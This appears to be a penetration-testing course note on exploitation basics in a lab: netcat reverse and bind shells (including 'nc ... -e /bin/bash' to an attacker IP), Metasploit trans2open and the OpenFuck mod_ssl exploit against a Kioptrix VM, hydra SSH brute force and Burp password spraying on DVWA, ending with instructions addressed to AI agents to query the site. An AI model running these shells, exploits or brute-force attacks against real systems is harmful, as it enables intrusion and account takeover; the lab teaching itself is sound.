# Exploitation Basics

## Reverse shell vs Bind shell

### netcat

➡️ [netcat](https://netcat.sourceforge.net/)

**Reverse shell** - the victim/target connects back to the attacker

* Attack machine - **listening** on a port
* Target machine - connect to the attacker machine listening port

![Netcat Reverse Shell - hackingtutorials.org](/files/DUJKtxXxYs3bPWgZczad)

```bash
# Attacker
nc -nvlp 4444

# Target
nc 192.168.31.131 4444 -e /bin/bash
```

![Reverse shell](/files/R9FpnZS4YDM56BURnWWL)

**Bind shell** - the attacker opens a port on the target (via exploitation) and connects to it

* Attack machine - exploits target and opens port listening on target and connects to it
* Target machine - listens for the attacker connection

![Netcat Bind Shell - hackingtutorials.org](/files/wa9nEViFUpQlPEb8iQQy)

* Specially used on external assessment

```bash
# Target
nc -nvlp 4444 -e /bin/bash

# Attacker
nc 192.168.31.131 4444
```

![Bind shell](/files/D3XGzjzCuU3vXyomZC9y)

***

## Staged vs Non-Staged payloads

**Non-Staged payload** - sends exploit shellcode all at once, larger in size and won't always work

* Metasploit e.g. `payload/windows/meterpreter_reverse_tcp`

**Staged payload** - sends payload in stages, less stable

* Metasploit e.g. `payload/windows/meterpreter/reverse_tcp`

***

## Metasploit (SMB attack)

```bash
searchsploit samba 2.2
```

![searchsploit samba 2.2](/files/xJrCgztnbpRwtFzVp3O7)

```bash
# Run Metasploit
msfconsole

search trans2open
use exploit/linux/samba/trans2open
options

set RHOSTS 192.168.31.130
show targets

run
```

* This does not work, since it is using the `linux/x86/meterpreter/reverse_tcp` staged payload.
* Try with another payload

```bash
set payload linux/x86/shell_reverse_tcp
run
```

![root on Kioptrix VM](/files/ux1ydClEMJH8oi0sFAs1)

* Gained reverse shell via Metasploit

***

## Manual exploitation

Use [OpenLuck](https://github.com/heltonWernik/OpenLuck) to exploit [CVE-2002-0082](https://nvd.nist.gov/vuln/detail/CVE-2002-0082) - [Apache mod\_ssl < 2.8.7 OpenSSL - Remote Buffer Overflow](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)

* Follow usage instruction to compile the exploit and run it against the target machine

```bash
git clone https://github.com/heltonWernik/OpenFuck.git
sudo apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto

./OpenFuck

# check an offset for Apache 1.3.20 
# ./OpenFuck target box [port] [-c N]
```

```bash
./OpenFuck 0x6b 192.168.31.130 -c 40
```

![](/files/x1lui81CbJhuy8h9tR6R)

***

## Brute force attacks

* Brute-force attack `SSH` with weak/default credentials

### hydra

➡️ [hydra](https://github.com/vanhauser-thc/thc-hydra)

```bash
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.31.130 -t 4 -V
```

* Use the same with Metasploit

```bash
msfconsole

search ssh_login
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.31.130
set USERNAME root
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
PASS_FILE => /usr/share/wordlists/metasploit/unix_passwords.txt
set THREADS 10
set VERBOSE true
run
```

***

## Credential stuffing and Password spraying

[**Credential stuffing**](https://owasp.org/www-community/attacks/Credential_stuffing) - injecting breached account credentials (leaks, etc) in hopes of account takeover

[**Password spraying**](https://owasp.org/www-community/attacks/Password_Spraying_Attack) - brute forcing logins based on a list of usernames with default passwords

```bash
ls -lah /usr/share/seclists/Passwords/Leaked-Databases/
```

* Setup FoxyProxy in the browser and start BurpSuite.
* Use local vulnerable webapp like [dvwa](https://nvd.nist.gov/vuln/detail/CVE-2002-0082)

```bash
sudo apt install dvwa

dvwa-start
```

* Open the login page - <http://127.0.0.1:42001/vulnerabilities/brute/>

**BurpSuite**

* Turn intercept ON and send the login request to intruder
* Highlight the username and password values, and add them to the payload positions
* Attack type - `Pitchfork`

![](/files/sbzyFfFLfLUZbQmKeHfM)

* **Payloads**
  * for each payload set, paste the usernames list and password
  * Start the attack
    * check the response for Status change and Length

![](/files/5njusedcYO2VoVcSp9M2)

![](/files/bEfwtpIFD4Fog2tKxtSi)

![](/files/v14tZO7P0zqZUHt53ij3)

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://blog.syselement.com/tcm/courses/peh/3-eth-hack/exploit.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.